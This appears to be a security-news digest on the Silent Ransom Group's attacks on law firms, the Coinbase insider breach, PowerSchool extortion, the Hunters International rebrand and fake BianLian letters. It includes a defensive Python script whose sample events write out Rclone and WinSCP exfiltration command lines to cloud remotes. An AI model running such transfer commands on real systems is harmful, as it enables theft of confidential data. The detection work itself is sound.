Pierluigi Paganini@Security Affairs
//
The FBI has issued a warning to U.S. law firms regarding an escalating cyber threat posed by the Silent Ransom Group (SRG), also known as Luna Moth or Chatty Spider. This group, active since 2022, has refined its tactics to target law firms specifically since early 2023, likely due to the valuable and confidential client data they possess. The group aims to gain unauthorized access to systems and devices in order to steal sensitive information and extort victims with threats of public data leaks.
SRG's methods include IT-themed social engineering calls and callback phishing emails. In these attacks, they impersonate IT personnel to deceive employees into granting remote access to systems. They may direct the employee to a malicious website or send a link via email that installs remote access software. Once inside, the attackers discreetly extract sensitive files using tools like WinSCP or disguised versions of Rclone. This campaign is particularly dangerous because it leaves minimal digital traces and can bypass traditional security measures.
To defend against these attacks, the FBI urges law firms to enhance staff training to recognize and avoid social engineering tactics. Implementing multi-factor authentication is crucial, as is proactive monitoring for unauthorized access attempts. The agency also advises that victims share any ransom evidence with law enforcement to aid in investigations. Furthermore, CISOs are encouraged to fortify help desk and employee defenses, enhance intrusion detection and tracking capabilities, and recognize that paying ransoms is not a viable strategy.
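As an added defender-side example (not code from the FBI notice or from Security Affairs), the script below triages constructed Sysmon-style process-creation events for the two exfiltration signals the summary names: an Rclone binary renamed to something innocuous and WinSCP driven non-interactively from a script. The field names, paths and remote names are all constructed sample data.

```python
"""Flag process-creation events that resemble the exfiltration tooling described above."""
import re

# Rclone subcommands and flags commonly seen on bulk-transfer command lines.
RCLONE_SUBCOMMANDS = {"copy", "sync", "move", "copyto", "lsd", "ls"}
RCLONE_FLAGS = {"--config", "--transfers", "--progress", "-P",
                "--ignore-existing", "--no-check-certificate"}
# Rclone addresses remotes as "name:path"; requiring 2+ characters before the
# colon keeps Windows drive letters such as C:\ from matching.
REMOTE_RE = re.compile(r"(?:^|\s)[A-Za-z0-9_-]{2,}:[^\s]*")


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return re.split(r"[\\/]", path)[-1].lower()


def analyze_event(event: dict) -> list:
    """Return human-readable findings for one process-creation event (empty if benign)."""
    findings = []
    image = basename(event.get("Image", ""))
    orig = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    tokens = cmd.split()  # simplification: assumes no spaces in the image path
    # 1. PE version metadata still says rclone.exe although the file was renamed.
    if orig == "rclone.exe" and image != "rclone.exe":
        findings.append(f"rclone renamed to {image}")
    # 2. Rclone-style command line, whatever the file is called and even if metadata was stripped.
    sub = next((t.lower() for t in tokens[1:] if not t.startswith("-")), None)
    flags = {t.split("=", 1)[0] for t in tokens[1:] if t.startswith("-")}
    if sub in RCLONE_SUBCOMMANDS and (flags & RCLONE_FLAGS or REMOTE_RE.search(cmd)):
        findings.append(f"rclone-style '{sub}' transfer from {image}")
    # 3. WinSCP run non-interactively (/script or /command), typical for bulk transfers.
    if orig in {"winscp.exe", "winscp.com"} or image in {"winscp.exe", "winscp.com"}:
        if any(t.lower().startswith(("/script", "/command")) for t in tokens[1:]):
            findings.append("scripted WinSCP session")
    return findings


def scan(events: list) -> dict:
    """Map EventId -> findings, keeping only events that produced at least one."""
    return {e["EventId"]: f for e in events if (f := analyze_event(e))}


# Constructed sample events (Sysmon-like shape); not real telemetry.
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": r"C:\Windows\Temp\svchost.exe", "OriginalFileName": "rclone.exe",
     "CommandLine": r"C:\Windows\Temp\svchost.exe copy C:\Share\Cases mega:cases --config=C:\Temp\r.conf --transfers 32"},
    {"EventId": 2, "Image": r"C:\Tools\winscp.com", "OriginalFileName": "WinSCP.com",
     "CommandLine": r"C:\Tools\winscp.com /script=C:\Temp\up.txt"},
    {"EventId": 3, "Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"C:\Windows\System32\notepad.exe C:\Users\jdoe\notes.txt"},
    {"EventId": 4, "Image": r"C:\Users\Public\update.exe", "OriginalFileName": "",
     "CommandLine": r"C:\Users\Public\update.exe sync C:\Data s3remote:bucket/data -P"},
]

if __name__ == "__main__":
    for event_id, findings in scan(SAMPLE_EVENTS).items():
        print(event_id, "; ".join(findings))
```

Event 4 shows why the command-line heuristic matters: with the version metadata stripped, only the Rclone argument shape gives the renamed binary away.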
References:
- DataBreaches.Net: DataBreaches.net issues a Private Industry Notification about the Silent Ransom Group targeting law firms.
- securityaffairs.com: SecurityAffairs reports on Silent Ransom Group targeting law firms, the FBI warns.
- The DefendOps Diaries: The DefendOps Diaries explores the Silent Ransom Group's new era of cyber extortion.
- bsky.app: The FBI warned that an extortion gang known as the Silent Ransom Group has been targeting U.S. law firms over the last two years in callback phishing and social engineering attacks.
- BleepingComputer: FBI warns of Luna Moth extortion attacks targeting law firms
- ciso2ciso.com: Silent Ransom Group targeting law firms, the FBI warns – Source: securityaffairs.com
- hackread.com: FBI Warns of Silent Ransom Group Targeting Law Firms via Scam Calls
- databreaches.net: Private Industry Notification: Silent Ransom Group Targeting Law Firms
- Security Affairs: The FBI warns that the Silent Ransom Group, active since 2022 and also known as Luna Moth, has targeted U.S. law firms using phishing and social engineering. Linked to BazarCall campaigns, the group previously […]
- ciso2ciso.com: FBI Warns of Silent Ransom Group Targeting Law Firms via Scam Calls – Source:hackread.com
- malware.news: Private Industry Notification: Silent Ransom Group Targeting Law Firms
- ciso2ciso.com: FBI warns law firms: Silent Ransom Group uses phishing emails and fake IT calls to steal data, demanding ransom to prevent public leaks.
- gbhackers.com: FBI Issues on Silent Ransom Group Using Fake IT Support Calls to Target Victims
- malware.news: FBI Issues on Silent Ransom Group Using Fake IT Support Calls to Target Victims
- The Hacker News: The campaign leverages "information technology (IT) themed social engineering calls, and callback phishing emails, to gain remote access to systems or devices and steal sensitive data to extort the victims."
- gbhackers.com: The Federal Bureau of Investigation (FBI) has issued a critical alert regarding the escalating activities of the cyber threat actor known as Silent Ransom Group (SRG), also identified under aliases such as Luna Moth, Chatty Spider, and UNC3753.
- Tech Monitor: The FBI alerts law firms to rising threat of Silent Ransom Group’s extortion tactics
- thecyberexpress.com: FBI Warns about Silent Ransom Group Targeting Law Firms
- eSecurity Planet: The FBI warns law firms of a stealth phishing scam where hackers call victims, pose as IT staff, and use remote access tools to steal sensitive data.
- www.scworld.com: US law firms facing Luna Moth ransomware threat
- cyble.com: FBI Warns Silent Ransom Group Targeting U.S. Law Firms Using Social Engineering and Callback Phishing
- www.esecurityplanet.com: FBI Warns Law Firms: Hackers Are Calling Offices in Stealth Phishing Scam
- www.techradar.com: FBI warns legal firms of Luna Moth extortion attacks where hackers will call their office
Dissent@DataBreaches.Net
//
Coinbase recently disclosed a significant data breach resulting from a bribery scheme targeting overseas customer support agents. The breach, which came to light after a $20 million ransom demand, involved rogue contractors who abused their access to exfiltrate customer data. Coinbase has confirmed that these contractors, located outside the United States, were successfully bribed by cybercriminals to access internal systems and steal sensitive information. Upon discovering the unauthorized activity, Coinbase terminated the involved personnel and initiated a thorough internal investigation.
The compromised data, affecting less than 1% of Coinbase's monthly transacting users, includes names, addresses, phone numbers, email addresses, and the last four digits of Social Security numbers. Additionally, masked bank account numbers, some banking identifiers, government-issued ID images such as driver's licenses and passports, and account data including balance snapshots and transaction histories were exposed. Importantly, Coinbase has stated that no passwords, private keys, or access to customer funds were compromised, and Coinbase Prime accounts and wallets were unaffected.
In response to the breach, Coinbase refused to pay the $20 million ransom and instead offered a $20 million reward for information leading to the identification and prosecution of those responsible. The company is also reimbursing customers who mistakenly sent funds to the scammers due to phishing attempts. Furthermore, Coinbase is taking several steps to enhance security, including stricter identity verification, scam-awareness prompts, relocating support functions to a U.S.-based hub, and improving fraud monitoring and insider threat detection capabilities. This incident could cost Coinbase between $180 million and $400 million for remediation and customer reimbursement.
References:
- DataBreaches.Net: Coinbase says hackers bribed staff to steal customer data and are demanding $20 million ransom
- fortune.com: Coinbase puts $20 million bounty on crooks who tried to extort firm over stolen customer data
- BleepingComputer: Coinbase, a cryptocurrency exchange with over 100 million customers, has disclosed that cybercriminals working with rogue support agents stole customer data and demanded a $20 million ransom not to publish the stolen information.
- techcrunch.com: Coinbase says customers’ personal information stolen in data breach. The crypto exchange giant said the hacker was "paying multiple contractors or employees working in support roles," and contacted Coinbase with a ransom demand this week with stolen data, which Coinbase says is "credible."
- BleepingComputer: Coinbase data breach exposes customer info and government IDs
- www.bleepingcomputer.com: Coinbase Discloses Breach, Faces Up to $400 Million in Losses
- The Register - Security: Coinbase says some of its overseas support staff were paid off to steal information on behalf of cybercriminals, and the company is now being extorted for $20 million.
- Zack Whittaker: Coinbase CEO says the hacker demanded $20 million in a ransom payment not to publish the stolen data. A Coinbase spokesperson tells me that less than 1% of its monthly customers are affected.
- techxplore.com: Coinbase, the largest cryptocurrency exchange based in the U.S., said Thursday that criminals had improperly obtained personal data on the exchange's customers for use in crypto-stealing scams and were demanding a $20 million payment not to publicly release the info.
- Metacurity: Hacking incident could cost Coinbase $400 million, $20 million reward offered
- securityaffairs.com: Coinbase disclosed a data breach after an extortion attempt
- thecyberexpress.com: Coinbase details insider data theft that led to a $20 million ransom demand. In a and , Coinbase – the third largest crypto exchange by volume – said it will reimburse any customers tricked into sending funds to the attacker.
- The Hacker News: The Hacker News reports on Coinbase agents being bribed.
- Secure Bulletin: Coinbase, one of the world’s largest cryptocurrency exchanges with over 100 million customers, has disclosed a significant data breach orchestrated through insider collusion.
- cyberinsider.com: Coinbase Hit by Insider Breach and Extortion, User Data Compromised
- securebulletin.com: Coinbase faces major Data Breach: $400 Million in potential losses
- www.metacurity.com: Hacking incident could cost Coinbase $400 million, $20 million reward offered
- Zack Whittaker: Coinbase says it was breached, and customers' personal information stolen. The crypto giant said the hacker was "paying multiple contractors or employees working in support roles," and contacted Coinbase with a ransom demand this week with stolen data, which Coinbase says is "credible."
- The DefendOps Diaries: Inside the Coinbase Breach: Lessons in Cybersecurity
- techxplore.com: Coinbase on Thursday said criminals bribed and duped their way to stealing cryptocurrency from its users, then tried to blackmail the exchange to keep the crime quiet.
- Risky Business Media: Risky Bulletin: Coinbase reveals insider breach, extortion attempt
- hackread.com: Coinbase Customer Info Stolen by Bribed Overseas Agents
- techcrunch.com: Coinbase says customers’ personal information stolen in data breach
- www.techradar.com: Personal information leaked in Coinbase cyberattack, cost could be $400 million
- Security Latest: Coinbase Will Reimburse Customers Up to $400 Million After Data Breach
- Matthew Rosenquist: This is how you handle digital extortion! Cybercriminals attempted to extort $20 million from Coinbase, but Coinbase refused and will instead fund a $20 million bounty for those that provide information that leads to the attacker’s arrest!
- Cybersecurity Blog: Cracking the Coinbase Breach: What Went Wrong and What We Can Learn
- www.cybersecuritydive.com: The crypto exchange is offering a $20 million reward for information leading to the hackers’ arrest. Coinbase terminated customer support agents who leaked customer data.
- Threats | CyberScoop: Coinbase flips $20M extortion demand into bounty for info on attackers
- Bitcoin News: Coinbase says it might cost between $180 million and $400 million to upgrade its security measures and reimburse lost funds.
- www.csoonline.com: Coinbase ( ), the largest crypto exchange in the US, is offering a $20 million bounty for information leading to those behind a May 2025 breach that compromised customer data.
- cyberscoop.com: Coinbase is offering a $20 million reward for information leading to the hackers’ arrest.
- www.cybersecurity-insiders.com: Coinbase, one of the largest cryptocurrency exchanges, has disclosed a significant data breach that exposed sensitive customer information, including government-issued IDs. The attackers contacted Coinbase on May 11, demanding a $20 million ransom to prevent the public release of the stolen data.
- hackernoon.com: Contractor Backdoor: Coinbase Faces $400M Blow in Major Data Breach
Dissent@DataBreaches.Net
//
In December 2024, PowerSchool, a major provider of K-12 software serving 60 million students across North America, experienced a significant data breach. Hackers gained access to sensitive student and teacher data, including personally identifiable information such as Social Security numbers and health data, through a single stolen credential. The company, believing it was the best course of action, paid an undisclosed ransom to the threat actor to prevent the data from being made public; however, this has proven unsuccessful.
Months later, it has been revealed that the threat actors are now directly targeting individual school districts with extortion demands, using the stolen data from the initial breach. The Toronto District School Board (TDSB), along with other schools in North America, has confirmed receiving ransom demands from the attackers. The exposed information includes names, contact details, birth dates, Social Security numbers, and even some medical alert data. PowerSchool has confirmed that these extortion attempts are related to the original breach and is working with law enforcement.
Cybersecurity experts have warned against paying ransoms, as there is no guarantee that hackers will delete the stolen data. This case exemplifies the risk of paying extortion demands, as the threat actors have resurfaced to revictimize affected individuals and institutions with additional demands. PowerSchool is offering two years of free identity protection to affected individuals; however, the company will face pressure to improve its security and reassure stakeholders that it can prevent similar incidents in the future.
References:
- bsky.app: The hacker behind PowerSchool's December breach is now extorting schools, threatening to release stolen student and teacher data.
- Threats | CyberScoop: The large education tech vendor was hit by a cyberattack and paid a ransom in December. Now, a threat actor is attempting to extort the company’s customers with stolen data.
- The Register - Security: PowerSchool paid thieves to delete stolen student, teacher data. Crooks may have lied
- The DefendOps Diaries: Report discussing the PowerSchool data breach and its implications.
- BleepingComputer: PowerSchool is warning that the hacker behind its December cyberattack is now individually extorting schools, threatening to release the previously stolen student and teacher data if a ransom is not paid. [...]
- www.bleepingcomputer.com: BleepingComputer reports on PowerSchool hacker extorting school districts.
- cyberscoop.com: PowerSchool customers hit by downstream extortion threats
- BleepingComputer: PowerSchool hacker now extorting individual school districts
- malware.news: PowerSchool paid a hacker’s extortion demand, but now school district clients are being extorted anyway (2)
- DataBreaches.Net: PowerSchool paid a hacker’s extortion demand, but now school district clients are being extorted anyway (3)
- PCMag UK security: UK PCMag covers PowerSchool attackers extorting teachers.
- go.theregister.com: PowerSchool paid thieves to delete stolen student, teacher data. Crooks may have lied. Now individual school districts extorted by fiends
- Metacurity: PowerSchool hackers are extorting schools despite the company's ransom payment
- techcrunch.com: TechCrunch article on PowerSchool being hacked.
- hackread.com: PowerSchool Paid Ransom, Now Hackers Target Teachers for More
- ExpressVPN Blog: Teachers report that bad actors are now targeting them with threatening emails demanding payment following a massive 2024 breach affecting schools across the US and Canada. One of the largest hacks of US schools continues as teachers across the country say that threat actors are extorting them for more money and threatening to release the data.
- www.metacurity.com: PowerSchool hackers are extorting schools despite the company's ransom payment
- thecyberexpress.com: Toronto School Board Hit with Extortion Demand After PowerSchool Data Breach
- Blog: PowerSchool clients now targeted directly by threat actor
- cyberinsider.com: PowerSchool Ransom Fallout: Extortion Attempts Hit Schools Months After Data Breach
- www.techradar.com: PowerSchool hackers return, and may not have deleted stolen data as promised
- malware.news: Double-extortion tactics used in PowerSchool ransomware attack
- CyberInsider: Months after paying a ransom to suppress the fallout of a major data breach, PowerSchool is facing renewed turmoil as threat actors have begun extorting individual school districts using the same stolen data.
- Matthew Rosenquist: More extortions, same - a perfect example of how not to deal with risks. The nightmare continues for schools, students, and teachers whose private data was exposed by PowerSchool.
- matthewrosenquist.substack.com: PowerSchool data breach round 2 extortions
- aboutdfir.com: Reports an education tech provider paid thieves to delete stolen student, teacher data.
- MeatMutts: The educational sector has been rocked by a significant data breach involving PowerSchool, a leading education technology provider serving over 60 million students globally.
- aboutdfir.com: PowerSchool paid thieves to delete stolen student, teacher data. Looks like crooks lied. An education tech provider that paid a ransom to prevent the leak of stolen student and teacher data is now watching its school district customers get individually extorted by either the same ransomware crew that hit it – or someone connected to
Sergiu Gatlan@BleepingComputer
//
The Ransomware-as-a-Service (RaaS) group Hunters International has reportedly shifted its focus from ransomware to data extortion, rebranding itself as "World Leaks" on January 1, 2025. This change in tactics signals a new era in cybercrime, driven by the declining profitability of ransomware and increased scrutiny from law enforcement and governments worldwide. Group-IB researchers revealed that the group's senior personnel decided ransomware was becoming too "unpromising, low-converting, and extremely risky," leading to the development of an extortion-only operation.
The group is reportedly leveraging custom-built exfiltration tools to automate data theft from victim networks, enhancing its ability to carry out extortion-only attacks. Cybersecurity researchers have also linked Hunters International to the infamous Hive ransomware group. While Hunters International denies being a direct continuation of Hive, evidence suggests that it acquired Hive's source code and operational tools. The group targets various industries, including healthcare, real estate, and professional services, across North America, Europe, and Asia.
References:
- The DefendOps Diaries: Hunters International's shift to data extortion: a new era in cybercrime.
- BleepingComputer: The Hunters International Ransomware-as-a-Service (RaaS) operation is shutting down and rebranding with plans to switch to data theft and extortion-only attacks.
- Cyber Security News: Hunters International Linked to Hive Ransomware in Attacks on Windows, Linux, and ESXi Systems
- The Register - Security: Crimelords at Hunters International tell lackeys ransomware too 'risky'
- securityboulevard.com: Details of the rebranding and shift in focus to extortion by Hunters International.
- bsky.app: The Hunters International ransomware group is shutting down and rebranding as World Leaks – an extortion-only operation.
- The420.in: The ransomware-as-a-service (RaaS) operation Hunters International has announced a strategic pivot: shutting down its encryption-based ransomware campaigns and rebranding as a new extortion-only group known as "World Leaks."
Shira Landau@Email Security - Blog
//
The FBI has issued a warning regarding a new data extortion scam where criminals are impersonating the BianLian ransomware group. These fraudsters are sending physical letters through the United States Postal Service to corporate executives, claiming their networks have been breached. The letters demand Bitcoin payments in exchange for preventing the release of sensitive company data.
Analysis suggests these letters are fraudulent, and organizations, particularly within the US healthcare sector, are advised to report such incidents to the FBI. Security vendors, including Arctic Wolf and Guidepoint Security, have studied these letters and believe the campaign is a ruse by someone pretending to be BianLian. The letters mimic conventional ransom notes, demanding payments of between $250,000 and $350,000 within 10 days.
This activity highlights the evolving tactics of cybercriminals who are now employing postal mail to target high-profile individuals in an attempt to extort money under false pretenses. The FBI urges companies to implement internal protocols for verifying ransom demands and to remain vigilant against these deceptive practices. It’s crucial for organizations to discern fake attacks from real ones amidst the increasing complexity of cybercrime.
References:
- Arctic Wolf: Self-Proclaimed "BianLian Group" Uses Physical Mail to Extort Organizations
- CyberInsider: Fake BianLian Ransom Notes Delivered to Executives via Post Mail
- DataBreaches.Net: Bogus ‘BianLian’ Gang Sends Snail-Mail Extortion Letters
- www.csoonline.com: Ransomware goes postal: US healthcare firms receive fake extortion letters
- PCMag UK security: Businesses Are Receiving Snail Mail Ransomware Threats, But It's a Scam
- BrianKrebs: Someone has been snail mailing letters to various businesses pretending to be the BianLian ransomware group.
- Cyber Security News: FBI Warns of Data Extortion Scam Targeting Corporate Executives
- gbhackers.com: FBI Warns: Threat Actors Impersonating BianLian Group to Target Corporate Executives
- techcrunch.com: There is no confirmed link between the campaign and the actual BianLian ransomware group, making this an elaborate impersonation.
- thecyberexpress.com: FBI Issues Urgent Warning About Data Extortion Scam Targeting Corporate Executives
- Email Security - Blog: The U.S. Federal Bureau of Investigation (FBI) has recently released an urgent advisory pertaining to a sophisticated email-based extortion campaign.
- Threats | CyberScoop: The FBI is warning business leaders about the scam perpetrated by an unidentified threat group.
- gbhackers.com: The novel approach highlights a shift in extortion tactics.
- Vulnerable U: Executives Receive Fake Snail Mail BianLian Ransomware Notes
- Malwarebytes: Ransomware threat mailed in letters to business owners
- www.scworld.com: The FBI is warning of a ransomware operation targeting C-suite executives via the US Postal Service.
- Cyber Security News: Fake BianLian Ransom Scams Target U.S. Firms Through Mailed Letters
- borncity.com: CISA warning: Cyber criminals (BianLian Groupe) attempt to blackmail executives
- Jon Greig: The FBI warned executives of a new scam where people claiming to be part of the BianLian ransomware gang are mailing physical letters with threats. Arctic Wolf said it is aware of at least 20 organizations or executives who have received these letters.
- Kali Linux Tutorials: Cyber Threat Group Sends Paper-Based Extortion Letters
- The DefendOps Diaries: Cybercriminals exploit YouTube's copyright system to extort creators, spreading malware and demanding ransoms.
- www.bleepingcomputer.com: Cybercriminals are sending bogus copyright claims to YouTubers to coerce them into promoting malware and cryptocurrency miners on their videos.